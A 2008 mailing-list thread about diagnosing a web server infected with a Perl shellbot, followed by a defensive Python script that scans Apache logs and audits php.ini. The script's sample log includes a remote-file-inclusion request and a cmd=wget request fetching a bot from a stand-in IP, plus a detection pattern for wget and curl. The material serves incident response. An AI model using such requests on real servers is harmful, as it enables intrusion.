sbeam wrote:
On Tuesday 12 August 2008 09:08, Mr Shunz wrote:
maybe you should check with "lsof -p 3041" and see which files/pipes it uses to have a clue.
of course! <slap>
it's a perl w0rm that was uploaded last night, now killed. Now to determine how it got in.
I found some output in the main apache error log that looks like wget was used to download a shellbot. But I can't figure out how wget was called, maybe some PHP exec() call that is unchecked.
Anything in /tmp?
Disable register_globals and allow_url_fopen. Set open_basedir for any virtual hosts to the absolute minimum.
That will help a bit.
But I can't find it on the system yet or the data files it uses.
chkrootkit says all is clear.
mod_security is now being installed, belatedly. This server has only been up 1 week, sheesh.
Thanks, Sam
It was most likely executed via a remote server. Look for URLs in the logs that fetch stuff from remote servers.
cheers, Rainer
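Two of the suggestions in this thread can be turned into a quick check: Sam's advice to turn off register_globals and allow_url_fopen and set open_basedir, and Rainer's advice to search the access log for requests that pass a remote URL (or a wget invocation, as seen in the error log) into a PHP script. The script below is an added example written for this thread, not something any of the posters shipped; the log lines, IP addresses, paths and php.ini excerpts it contains are constructed samples, and the combined-log regex assumes the default Apache "combined" LogFormat.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" LogFormat. Assumption: the server uses the stock format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter whose whole value is an absolute URL is what a remote-file
# inclusion through allow_url_fopen looks like in the access log.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Download tools handed to an unchecked exec(), as the error log showed.
DOWNLOAD_TOOL = re.compile(r'\b(wget|curl)\s', re.IGNORECASE)


def query_params(request_path):
    """Decode the query string of a logged request into (key, value) pairs."""
    return parse_qsl(urlsplit(request_path).query, keep_blank_values=True)


def remote_url_params(request_path):
    """Return the (key, value) parameters whose value is a remote URL."""
    return [(k, v) for k, v in query_params(request_path) if REMOTE_SCHEME.match(v)]


def scan_access_log(log_text):
    """Return (line_number, reason) findings for suspicious requests."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            findings.append((n, "unparseable line"))
            continue
        path = m.group("path")
        for key, value in remote_url_params(path):
            findings.append((n, f"remote URL in parameter {key!r}: {value}"))
        for key, value in query_params(path):
            if DOWNLOAD_TOOL.search(value):
                findings.append((n, f"download tool in parameter {key!r}: {value}"))
    return findings


def _as_bool(value):
    """Normalise the spellings php.ini accepts for a boolean directive."""
    return "on" if value.strip().strip('"').lower() in {"1", "on", "true", "yes"} else "off"


def audit_php_ini(ini_text):
    """Report the directives Sam recommends that are missing or still permissive.

    open_basedir is usually set per vhost (php_admin_value open_basedir ...),
    but a global php.ini value is checked the same way."""
    settings = {}
    for raw in ini_text.splitlines():
        line = raw.split(';', 1)[0].strip()   # ';' starts a comment
        if '=' in line:
            key, value = line.split('=', 1)
            settings[key.strip().lower()] = value.strip().strip('"')
    findings = []
    for directive in ("register_globals", "allow_url_fopen"):
        if directive not in settings:
            findings.append(f"{directive} not set explicitly; set it to Off")
        elif _as_bool(settings[directive]) != "off":
            findings.append(f"{directive} = {settings[directive]}; set it to Off")
    if not settings.get("open_basedir"):
        findings.append("open_basedir is empty; restrict each vhost to its own docroot and tmp")
    return findings


# Constructed sample log: line 1 passes a remote URL to a PHP script, line 2 is
# a normal image request, line 3 passes a wget command line as a parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2008:03:14:22 +0200] "GET /index.php?page=http://198.51.100.9/sh.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Aug/2008:03:14:25 +0200] "GET /img/logo.png HTTP/1.1" 200 4096 "http://www.example.org/" "Mozilla/5.0"
198.51.100.9 - - [12/Aug/2008:03:15:01 +0200] "GET /cgi/run.php?cmd=wget%20http%3A%2F%2F198.51.100.9%2Fbot.pl HTTP/1.1" 200 77 "-" "libwww-perl/5.805"
"""

# Constructed php.ini excerpts: the permissive settings beside the hardened ones.
WEAK_PHP_INI = """\
; excerpt from a default-ish php.ini
register_globals = On
allow_url_fopen = On
; open_basedir left unset
"""
HARDENED_PHP_INI = """\
register_globals = Off
allow_url_fopen = Off
open_basedir = "/var/www/example.org/htdocs:/var/www/example.org/tmp"
"""

if __name__ == "__main__":
    for n, reason in scan_access_log(SAMPLE_LOG):
        print(f"access log line {n}: {reason}")
    for finding in audit_php_ini(WEAK_PHP_INI):
        print(f"php.ini: {finding}")
```

Against a real server, feed the output of `zcat`/`cat` of the vhost access logs into scan_access_log and the running php.ini (php -i shows the loaded file) into audit_php_ini; a hit from remote_url_params points at the script and parameter that need an include() or fopen() whitelist, which is the "how it got in" question sbeam is chasing.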